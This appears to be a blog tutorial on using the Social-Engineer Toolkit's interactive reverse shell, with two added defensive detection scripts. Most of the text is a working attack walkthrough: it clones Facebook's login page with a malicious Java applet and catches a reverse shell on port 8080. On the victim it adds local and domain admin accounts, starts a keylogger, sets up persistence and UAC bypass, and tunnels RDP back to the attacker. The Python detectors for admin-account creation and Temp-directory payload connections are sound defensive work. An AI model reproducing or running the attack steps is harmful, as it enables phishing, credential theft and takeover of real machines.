This is a feature that lets you establish an interactive shell with a compromised victim, working much like a meterpreter session in Metasploit Framework. To use it, run the web attack vector with a malicious applet and then select the payload corresponding to SET's interactive shell, as shown below:

set > webattack > 2

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: http://www.facebook.com

[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: Ipy2dMKRaC3
[*] Malicious java applet website prepped for deployment

What payload do you want to generate:

  Name:                                   Description:

   1. Windows Shell Reverse_TCP           Spawn a command shell on victim and send back to attacker
   2. Windows Reverse_TCP Meterpreter     Spawn a meterpreter shell on victim and send back to attacker
   3. Windows Reverse_TCP VNC DLL         Spawn a VNC server on victim and send back to attacker
   4. Windows Bind Shell                  Execute payload and create an accepting port on remote system
   5. Windows Bind Shell X64              Windows x64 Command Shell, Bind TCP Inline
   6. Windows Shell Reverse_TCP X64       Windows X64 Command Shell, Reverse TCP Inline
   7. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
   8. Windows Meterpreter Egress Buster   Spawn a meterpreter shell and find a port home via multiple ports
   9. Windows Meterpreter Reverse HTTPS   Tunnel communication over HTTP using SSL and use Meterpreter
  10. Windows Meterpreter Reverse DNS     Use a hostname instead of an IP address and spawn Meterpreter
  11. SE Toolkit Interactive Shell        This is the new custom interactive reverse shell designed for SET
  12. RATTE HTTP Tunneling Payload        This is a security bypass payload that will tunnel all comms over HTTP
  13. Import your own executable          Specify a path for your own executable
Option number 11 corresponds to SET's interactive shell.

set > payloads > 11

[-] Enter the PORT of the listener (enter for default): 8080
[*] Done, moving the payload into the action.
[*] Packing the executable and obfuscating PE file randomly, one moment.
[*] Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload...

***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

[--] Tested on IE6, IE7, IE8, IE9, Safari, Opera, Chrome, and FireFox [--]

[*] Launching the SET Interactive Shell...
[*] Loaded SET core modules into SET Interactive Listener...
[*] Crypto.Cipher library is installed. AES will be used for socket communication.
[*] All communications will leverage AES 256 and randomized cipher-key exchange.
The Social-Engineer Toolkit (SET) is listening on: 0.0.0.0:8080
As an interesting note, this type of console gives the communication a secure key exchange based on AES 256, which is used for the traffic between both ends of the connection.

When a victim runs the malicious applet, an interactive session is started using SET:

[*] Connection received from: 192.168.1.40

*** Pick the number of the shell you want ***

1: 192.168.1.40:WINDOWS

Enter your numeric choice: 1
[*] Dropping into the Social-Engineer Toolkit Interactive Shell.

set>
From here it is possible to interact with the victim through the commands available in the interactive shell. To see the available commands, enter the "?" character:

set> ?

Welcome to the Social-Engineer Toolkit Help Menu.

Enter the following commands for usage:

Command: shell
Explanation: drop into a command shell
Example: shell

Command: download <path_to_file>
Explanation: downloads a file locally to the SET root directory.
Example: download C:\boot.ini or download /etc/passwd

Command: upload <path_to_file_on_attacker> <path_to_write_on_victim>
Explanation: uploads a file to the victim system
Example: upload /root/nc.exe C:\nc.exe or upload /root/backdoor.sh /root/backdoor.sh

Command: ssh_tunnel <attack_ip> <attack_ssh_port> <attack_tunnelport> <user> <pass> <tunnel_port>
Explanation: This module tunnels ports from the compromised victims machine back to your machine.
Example: ssh_tunnel publicipaddress 22 80 root complexpassword?! 80

Command: exec <command>
Explanation: Execute a command on your LOCAL 'attacker' machine.
Example exec ls -al

Command: ps
Explanation: List running processes on the victim machine.
Example: ps

Command: kill <pid>
Explanation: Kill a process based on process ID (number) returned from ps.
Example: kill 3143

Command: reboot now
Explanation: Reboots the remote server instantly.
Example: reboot now

Command: localadmin <username> <password>
Explanation: adds a local admin to the system
Example: localadmin bob p@55w0rd!

Command: domainadmin <username> <password>
Explanation: adds a local admin to the system
Example: domainadmin bob p@55w0rd!

Command: bypassuac <ipaddress_of_listener> <port_of_listener> <x86 or x64>
Explanation: Trigger another SET interactive shell with the UAC safe flag
Example bypassuac 172.16.32.128 443 x64

Command: grabsystem <ipaddress_of_listener> <port_of_listener>
Explanation: Uploads a new set interactive shell running as a service and as SYSTEM.
Caution: If using on Windows 7 with UAC enabled, run bypassuac first before running this.
Example: grabsystem 172.16.32.128 443

Command: keystroke_start
Explanation: Starts a keystroke logger on the victim machine. It will stop when shell exits.
Example: keystroke_start

Command: keystroke_dump
Explanation: Dumps the information from the keystroke logger. You must run keystroke_start first.
Example: keystroke_dump

Command: lockworkstation
Explanation: Will lock the victims workstation forcing them to log back in. Useful for capturing keystrokes.
Example: lockworkstation

Command: persistence <ipaddress_of_listener> <port_of_listener>
Explanation: Persistence will spawn a SET interactive shell every 30 minutes on the victim machine.
Example: persistence 172.16.32.128 443
Warning: Will not work with UAC enabled *yet*.

Command: removepersistence
Explanation: Will remove persistence from the remote victim machine.
Example: removepersistence
As can be seen in the list of available options, and allowing for some differences, it follows a philosophy very similar to that of Metasploit Framework's meterpreter, with a set of options that extends an attacker's range of possibilities beyond a plain Windows (or Linux) console. The options are self-explanatory and show how simple this console in SET is to use; running some of these commands gives the following results:

set> exec pwd
/opt/set_svn

set> ps
C:\WINDOWS\Explorer.EXE PID:1456
C:\Program Files\Java\jre6\bin\jusched.exe PID:940
C:\WINDOWS\system32\taskswitch.exe PID:952
C:\WINDOWS\system32\wuauclt.exe PID:1792
C:\DOCUME~1\Owner\LOCALS~1\Temp\x8UdxzKurw.exe PID:2564
C:\DOCUME~1\Owner\LOCALS~1\Temp\x8UdxzKurw.exe PID:2572

set/command_shell>ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.40
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1

set/command_shell>net user

User accounts for \\ANONYMOUS

-------------------------------------------------------------------------------
Administrator            ASPNET                   Guest
HelpAssistant            Owner                    SUPPORT_388945a0
The command completed successfully.

set/command_shell>quit
[*] Dropping back to interactive shell...

set> domainadmin adastra password
[*] Attempting to add a user account with domain administrative permissions.
[*] User add completed. Check the system to ensure it worked correctly.

set> localadmin jdaanial jdaanial
[*] Attempting to add a user account with administrative permissions.
[*] User add completed. Check the system to ensure it worked correctly.

set> keystroke_start
[*] Keystroke logger has been started on the victim machine

set> keystroke_dump
keys pulsed here!!!
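From the defender's side, the `localadmin` and `domainadmin` commands shown above leave a very recognisable trace in the Windows Security log: an account is created and, within seconds, added to an administrative group. The following is an added example (not SET code, and not from the original post) that correlates those two steps. It relies on the standard event IDs 4720 (user account created), 4732 (member added to a security-enabled local group) and 4728 (member added to a security-enabled global group); the event records themselves are a constructed, simplified representation of the fields those events carry, and the ten-minute window and the `ADMIN_GROUPS` set are assumptions you would tune for your environment.

```python
"""Flag accounts that are created and made admin within a short window.

Added example, not part of SET. Event IDs 4720/4732/4728 are the standard
Windows Security events; the records below are constructed samples.
"""
from datetime import datetime, timedelta

# Assumed set of groups whose membership we treat as administrative.
ADMIN_GROUPS = {"Administrators", "Domain Admins"}

# Constructed sample events, in the order the host from the session above
# would log them after 'domainadmin adastra password' and
# 'localadmin jdaanial jdaanial', followed by two benign changes.
SAMPLE_EVENTS = [
    {"time": "2012-03-10T14:02:11", "id": 4720, "subject": "ANONYMOUS\\Owner",
     "target_user": "adastra"},
    {"time": "2012-03-10T14:02:12", "id": 4728, "subject": "ANONYMOUS\\Owner",
     "member": "adastra", "group": "Domain Admins"},
    {"time": "2012-03-10T14:02:40", "id": 4720, "subject": "ANONYMOUS\\Owner",
     "target_user": "jdaanial"},
    {"time": "2012-03-10T14:02:41", "id": 4732, "subject": "ANONYMOUS\\Owner",
     "member": "jdaanial", "group": "Administrators"},
    # benign: helpdesk creates a normal user, no admin group change follows
    {"time": "2012-03-10T15:30:00", "id": 4720, "subject": "CORP\\helpdesk",
     "target_user": "newhire"},
    # benign: that account is promoted ten days later, outside the window
    {"time": "2012-03-20T09:00:00", "id": 4732, "subject": "CORP\\itadmin",
     "member": "newhire", "group": "Administrators"},
]


def find_new_admins(events, window=timedelta(minutes=10)):
    """Return one alert per account created and made admin within `window`."""
    created = {}   # lower-cased username -> creation timestamp
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4720:
            created[ev["target_user"].lower()] = ts
        elif ev["id"] in (4728, 4732) and ev.get("group") in ADMIN_GROUPS:
            t0 = created.get(ev["member"].lower())
            if t0 is not None and ts - t0 <= window:
                alerts.append({
                    "user": ev["member"],
                    "group": ev["group"],
                    "by": ev["subject"],
                    "seconds_after_creation": (ts - t0).total_seconds(),
                })
    return alerts


if __name__ == "__main__":
    for a in find_new_admins(SAMPLE_EVENTS):
        print(f"ALERT: {a['user']} created and added to {a['group']} "
              f"by {a['by']} after {a['seconds_after_creation']:.0f}s")
```

The correlation is deliberately narrow: a new account alone (the helpdesk case) or a promotion of a long-standing account (the `newhire` case ten days later) does not fire, while the create-then-promote pattern these shell commands produce does, regardless of which group name is used.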
An interesting feature of this type of console is the ability to create SSH tunnels between the attacker's machine and the compromised machine. This makes it possible to create additional points of access that will let the attacker try to compromise other services on the compromised machine, or on any other machine in the victim's network segment.

set> ssh_tunnel 192.168.1.33 22 3389 root clave 3389
[*] Telling the victim machine we are switching to SSH tunnel mode..
[*] Acknowledged the server supports SSH tunneling..
[*] Tunnel is establishing, check IP Address: 192.168.1.33 on port: 3389
[*] As an example if tunneling RDP you would rdesktop localhost 3389
From the attacker's machine (192.168.1.33) it can be seen that port 3389 is waiting for connections:

>netstat -ano | grep 3389
tcp        0      0 0.0.0.0:3389            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp6       0      0 :::3389                 :::*                    LISTEN      off (0.00/0/0)
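The netstat above is taken on the attacker's side, but the same kind of listing on the victim tells the other half of the story: the payload that the `ps` output earlier showed running from the user's Temp directory holds the outbound connections to the listener (port 8080) and, once the tunnel is up, to the attacker's SSH port (22). The following is an added example, not SET code and not from the original post, that joins a `ps`-style listing in the `path PID:n` format shown earlier with a Windows `netstat -ano` listing and flags established connections owned by executables living under a Temp directory. Both inputs are constructed samples, and the "runs from Temp" rule is an assumed heuristic, not something the tool itself defines.

```python
"""Join a process listing with netstat output and flag Temp-dir processes
that hold established network connections.

Added example (not part of SET). The listings are constructed samples
modelled on the 'ps' output above and on Windows 'netstat -ano'.
"""
import re
from typing import Dict, List, NamedTuple, Tuple

# Constructed process listing in the 'path PID:n' format the shell's ps used.
PS_OUTPUT = r"""
C:\WINDOWS\Explorer.EXE PID:1456
C:\Program Files\Java\jre6\bin\jusched.exe PID:940
C:\WINDOWS\system32\wuauclt.exe PID:1792
C:\DOCUME~1\Owner\LOCALS~1\Temp\x8UdxzKurw.exe PID:2564
C:\DOCUME~1\Owner\LOCALS~1\Temp\x8UdxzKurw.exe PID:2572
"""

# Constructed 'netstat -ano' output as the victim (192.168.1.40) would show it.
NETSTAT_OUTPUT = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       952
  TCP    192.168.1.40:1043      192.168.1.33:8080      ESTABLISHED     2564
  TCP    192.168.1.40:1044      192.168.1.33:22        ESTABLISHED     2572
  TCP    192.168.1.40:1050      91.198.174.192:80      ESTABLISHED     1792
  UDP    0.0.0.0:500            *:*                                    700
"""

# Assumed heuristic: any image path with a \Temp\ or \tmp\ component.
TEMP_DIR_RE = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)
PS_LINE_RE = re.compile(r"^(?P<path>.+?) PID:(?P<pid>\d+)\s*$")


class Conn(NamedTuple):
    local: str
    host: str
    port: int
    state: str
    pid: int


def parse_ps(text: str) -> Dict[int, str]:
    """Map PID -> image path from 'path PID:n' lines; other lines are ignored."""
    procs = {}
    for line in text.splitlines():
        m = PS_LINE_RE.match(line.strip())
        if m:
            procs[int(m.group("pid"))] = m.group("path")
    return procs


def parse_netstat(text: str) -> List[Conn]:
    """Parse the TCP rows of 'netstat -ano' (header and UDP rows are skipped)."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP":
            _, local, foreign, state, pid = parts
            host, _, port = foreign.rpartition(":")
            conns.append(Conn(local, host, int(port), state, int(pid)))
    return conns


def suspicious_connections(ps_text: str, netstat_text: str) -> List[Tuple[int, str, str]]:
    """Return (pid, image path, remote endpoint) for every ESTABLISHED
    connection whose owning process runs from a Temp directory."""
    procs = parse_ps(ps_text)
    hits = []
    for c in parse_netstat(netstat_text):
        path = procs.get(c.pid, "")
        if c.state == "ESTABLISHED" and TEMP_DIR_RE.search(path):
            hits.append((c.pid, path, f"{c.host}:{c.port}"))
    return hits


if __name__ == "__main__":
    for pid, path, remote in suspicious_connections(PS_OUTPUT, NETSTAT_OUTPUT):
        print(f"PID {pid} {path} -> {remote}")
```

On the sample data the two payload processes are reported (one talking to the listener on 8080, one to SSH on 22), while `wuauclt.exe`, which also has an established connection but runs from `system32`, is not; a PID from netstat that is absent from the process listing is treated as an empty path and therefore never matches.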
As indicated in the message printed after the SSH tunnel is created, a practical use of this feature can be to open a remote desktop session on the compromised machine with "rdesktop". If it is not installed, use the apt-get command on Debian and derivatives:

>apt-get install rdesktop

If it is already installed, simply running the following command on the attacker's machine:

>rdesktop localhost

will be enough to establish a remote desktop session with the compromised machine.